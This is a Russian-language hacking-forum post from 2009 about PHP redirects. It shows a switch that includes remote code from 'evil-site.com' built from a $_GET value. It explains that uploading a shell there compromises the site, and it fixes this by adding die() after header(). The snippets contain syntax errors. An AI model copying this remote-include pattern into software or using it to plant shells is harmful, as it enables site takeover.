03.08.2009, 13:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Ув.Spyder, готов с Вами подискутировать на эту тему!
А если будет листинг кода подобный этому?
PHP код:
switch($_GET['url'])
{
case "test":
header("location:http://google.ru");
include('http://evil-site.com/'.$_GET['url'].'.txt')
break;
case "test2":
header("location:http://yandex.ru");
default:
header("location:http://google.ru?error");
or die('Ошибон :D');
break;
}
тогда этот буквально как решето!!! всего лишь нужно похекать сайт http://evil-site.com/, и залить туда шелл с именем test.txt и все!!! Мы похеканы! а вот был бы код такой :
PHP код:
case "test":
header("location:http://google.ru");
die();
include('http://evil-site.com/'.$_GET['url'].'.txt')
break;
Мы бы были защищены! =)
Ты просто не знаешь особых условий, чтобы switch сделать инклудом
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|